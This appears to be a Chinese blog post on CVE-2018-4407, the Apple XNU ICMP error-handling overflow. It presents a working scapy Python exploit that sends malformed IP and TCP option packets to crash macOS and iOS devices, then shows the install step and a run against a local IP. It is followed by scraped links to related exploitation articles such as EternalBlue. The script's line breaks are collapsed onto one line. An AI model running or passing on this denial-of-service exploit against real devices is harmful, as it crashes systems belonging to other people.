2018-10-30 公开了一个 Apple 设备的远程代码执行漏洞 CVE-2018-4407,该漏洞是收到畸形数据包后,向发送方报告错误,在构造 ICMP 数据包时发生了溢出,影响 macOS 10.13.6 及以下版本,iOS 11 及以下版本

python exp,能够造成让系统崩溃,代码如下:

# CVE-2018-4407 ICMP DOS
# https://lgtm.com/blog/apple_xnu_icmp_error_CVE-2018-4407
# from https://twitter.com/ihackbanme
import sys
try:from scapy.all import *
except Exception as e:print ("[*] You need install scapy first:\n[*] sudo pip install scapy ")
if __name__ == '__main__':try:check_ip = sys.argv[1]print ("[*] !!!!!!Dangerous operation!!!!!!")print ("[*] Trying CVE-2018-4407 ICMP DOS " + check_ip)for i in range(8,20):send(IP(dst=check_ip,options=[IPOption("A"*i)])/TCP(dport=2323,options=[(19, "1"*18),(19, "2"*18)]))print ("[*] Check Over!! ")except Exception as e:print "[*] usage: sudo python check_icmp_dos.py 127.0.0.1"

测试 exp 之前安装一下 scapy

sudo pip install scapy

然后开始见证奇迹:

$ sudo python ./icmp_ddos.py 192.168.2.238
Fontconfig warning: ignoring UTF-8: not a valid region tag
Fontconfig warning: ignoring UTF-8: not a valid region tag
[*] !!!!!!Dangerous operation!!!!!!
[*] Trying CVE-2018-4407 ICMP DOS 192.168.2.238
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
[*] Check Over!! 

原文地址:https://www.exchen.net/apple_xnu_icmp_error_cve-2018-4407.html

CVE-2018-4407 苹果设备远程溢出漏洞相关推荐

  1. 【漏洞复现】永恒之蓝 MS17-010 远程溢出漏洞(CVE-2017-0143)

    文章目录 声明 前言 一.漏洞原理简述 二.漏洞代码深层解析 三.实验步骤 四.漏洞补丁 总结 声明 本篇文章仅用于技术研究与技术学习,切勿用于非授权下攻击行为,切记! 前言 Windows7 存在 ...

  2. 利用MS08067远程溢出漏洞抓肉鸡

    利用MS08067远程溢出漏洞抓肉鸡 陈小兵 [antian365.com] 微软的正版验证机会出来以后没有多久,就爆出针对台湾和简体中文版本的MS08067漏洞,这个时候微软主动爆出这个号称比冲击波 ...

  3. 一步到位的 UPnP 远程溢出漏洞实战

    远程溢出***漏洞 (Remote Buffer Overflow Vulnerability) 是远程直接***被黑 电脑或服务器最典型.最常见的漏洞,原因无它,只要溢出成功并运行 ShellCod ...

  4. linux远程溢出,Linux netkit in.telnetd远程溢出漏洞

    Linux netkit in.telnetd远程溢出漏洞 2008-04-09 04:30:32来源:互联网 阅读 () Linux netkit in.telnetd远程溢出漏洞 发布日期:200 ...

  5. c++ c6386 缓冲区 溢出_Office 远程溢出漏洞测试与分析

    本文作者:ghostkeeper(信安之路首次投稿作者) 获得奖励:加入信安之路核心群+免费邀请加入信安之路知识星球+免费获取 90sec 论坛邀请码 在 2017 年 11 月,微软发布的 11 月 ...

  6. 网安学习日记-永恒之蓝MS17-010远程溢出漏洞学习(CVE-2017-0143)

    一.漏洞原理简介 MS17-010漏洞出现在Windows SMB v1中的内核态函数srv!SrvOs2FeaListToNt在处理FEA(File Extended Attributes)转换时, ...

  7. 方式程0day MS17-010远程溢出漏洞测试

    最近那个WannaCry勒索病毒搞的沸沸扬扬,据了解该病毒利用了方程式泄露的0day MS17-010(永恒之蓝)进行传播. 据说这个漏洞是支持winxp-win2012,测试一下这个漏洞到底如何. ...

  8. 方程式ETERNALBLUE:Windows SMB远程溢出漏洞复现笔记

    0x01  环境搭建 win2003 攻击机,ip:192.168.0.28 kali 攻击机,ip:192.168.0.27 win7 靶机,ip:192.168.0.14:netstat -an ...

  9. 绿盟科技网络安全威胁周报2017.01 请关注MatrixSSL堆缓冲区溢出漏洞CVE-2016-6890

    绿盟科技发布了本周安全通告,周报编号NSFOCUS-16-39,绿盟科技漏洞库本周新增30条,其中高危9条.本次周报建议大家关注 MatrixSSL 堆缓冲区溢出漏洞 ,目前,此漏洞已经公布了一段时间 ...

最新文章

  1. rsa加密算法java实例,java实现的RSA加密算法详解
  2. PChar 类型的又一些用法
  3. 结对和团队项目建议 - 黄金点游戏
  4. (五)构建和训练深度伪造自动编码器
  5. SAP License:写给想入行或是想转行的朋友们
  6. SAP License:SAP中的报表查询
  7. getHandel redis_redis 使用 get 命令读取 bitmap 类型的数据
  8. 领导公开对你有成见,关键在于是否影响公司决策
  9. mysql把字段拆成两个_MySQL数据库中,将一个字段的值分割成多条数据显示
  10. 斯皮尔曼相关系数范围_斯皮尔曼相关系数
  11. 【Qt象棋游戏】05_象棋走棋规则——象、马、将、兵
  12. 鼠标事件界面转换 mouseover() 方法
  13. 怎么转换视频格式,视频格式不符如何转换?
  14. “程序猿”面试篇(一)聊项目
  15. 第九讲:因子分析(Factor analysis)
  16. 系统接口对接:(1)
  17. java中强耦合是什么意思_什么是Java程序的耦合
  18. 有些不知道自己应该做些什么
  19. 副业推荐不上班!12小时删!某宝付费买的资源,请低调使用~
  20. pdfjs预览pdf报错

热门文章

  1. SQL SERVER CLR Trigger功能
  2. Docker ASP.NET Core (5):Docker Compose
  3. flask的第一个hello word 程序
  4. 参数的范数正则/惩罚(parameter norm penalties)
  5. iOS的runtime运行时机制
  6. win系统注册缺少的库 32位系统 64位系统
  7. [转]Oracle update用例
  8. [网络安全自学篇] 三.Burp Suite安装配置、Proxy基础用法及流量分析示例
  9. iOS之从OpenGL深入探究离屏渲染及性能优化
  10. Python生成列表的所有子集